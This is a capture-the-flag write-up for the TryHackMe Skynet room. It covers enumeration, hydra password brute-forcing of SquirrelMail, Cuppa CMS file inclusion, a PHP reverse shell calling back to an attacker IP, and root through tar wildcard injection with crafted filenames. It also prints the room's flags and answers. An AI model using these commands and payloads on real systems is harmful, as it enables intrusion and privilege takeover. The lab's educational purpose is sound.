Skynet Writeup - TryHackMe

Skynet Writeup - TryHackMe

This is a writeup for the Skynet room, available on the TryHackMe.

Today we will see privilege escalation using wildcard injection: crafting manipulated filenames, an attacker can insert parameters into commands that are run by other users, such as the root account.

Introduction

Room Description

2022-05-07 14_39_59-Clipboard.png

Notes & Observations

  • There is milesdyson share that indicates a possible username
  • In the CMS code, there is a bit of PHP code that includes files and can be abused: include($_REQUEST["urlConfig"]
  • After gaining access to the target machine one of the first tasks is always to check for scheduled tasks
  • Insecurely used tar command is a way of getting admin privileges through wildcard injection

Used tools: nmap, hydra, ffuf, netcat, smbclient

Walkthrough

Enumeration

  1. Run the following nmap scan:

    nmap $ip -sV -sC -T4
    

    image.png

  2. Check the available SMB shares, hit enter when prompted for a password:

    smbclient -L //$ip -U guest
    

    image.png

  3. Go and check the anonymous share and download the log1.txt file (it contains strings that resemble passwords):

    smbclient //$ip/anonymous
    cd logs
    get log1.txt
    

    image.png

What is Miles' password for his emails?

Answer: cyborg007haloterminator

  1. Run web directory enumeration with ffuf:

    ffuf -u http://ip$/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -c -t 200
    

    image.png

  2. Go to this address: http://<IP:PORT>/squirrelmail/ image.png

  3. Try to login with a random username and password. Notice the sent post request and the error message:

    login_username=a&secretkey=b&js_autodetect_results=1&just_logged_in=1
    

    image.png

  4. Use hydra's http-post module to find the password for the email server. We know so far that the username is probably milesdyson (as the SMB share name suggests) and we have some log1.txt file with strings that may contain a correct password:

    hydra $ip http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:password incorrect" -l milesdyson -P log1.txt -f -V
    

    image.png

What is the hidden directory?

Answer: /45kra24zxs28v3yd

  1. Login with milesdyson:cyborg007haloterminator credentials and locate the SMB password among the emails.: image.png

  2. Use the newly found SMB password to access the milesdyson share:

    smbclient //$ip/milesdyson -U milesdyson
    
  3. Access the file content of the \notes\important.txt:

    get \notes\important.txt -
    
    1. Add features to beta CMS /45kra24zxs28v3yd
    2. Work on T-800 Model 101 blueprints
    3. Spend more time with my wife
    

What is the vulnerability called when you can include a remote file for malicious purposes?

Answer: Remote File Inclusion

What is the user flag?

Answer: 7ce5c2109a40f958099283600a9ae807

  1. Run another ffuf web directory search:

    ffuf -u http://10.10.235.79/45kra24zxs28v3yd/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -t 200
    

    image.png

  2. Use the newly found directory name and access the webpage:

    http://$ip/45kra24zxs28v3yd/administrator/
    
    • It's a Cuppa CMS based system.
  3. Find Cuppa CMS related vulnerabilities. Based on this description you can get the content of the user.txt file:

    http://$ip/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../home/milesdyson/user.txt
    

What is the root flag?

Answer: 3f0372db24753accc7179a282cd6a949

  1. Prepare a PHP reverse shell with your IP and a specific port on your machine. You can use this simple one:
    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'"); ?>
    
  2. Serve this file through python webserver:

    python3 -m http.server
    
  3. Prepare a netcat listener and access the shell from the Cuppa CMS:

    http://10.10.183.10/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.69.106:8000/shell.php
    

    image.png

  4. Check the crontab:

    cat /etc/crontab
    

    image.png

  5. Check the backup.sh file's content: image.png

  6. It is a tar wildcard vulnerability

  7. Let's set SUID on /bin/bash. Go to the /var/www/html folder and create these 3 files:

    printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh
    echo "" > "--checkpoint-action=exec=sh shell.sh"
    echo "" > --checkpoint=1
    

    image.png

  8. Wait 1 minute and run /bin/bash -p command and get the root flag at the /root/root.txt location: image.png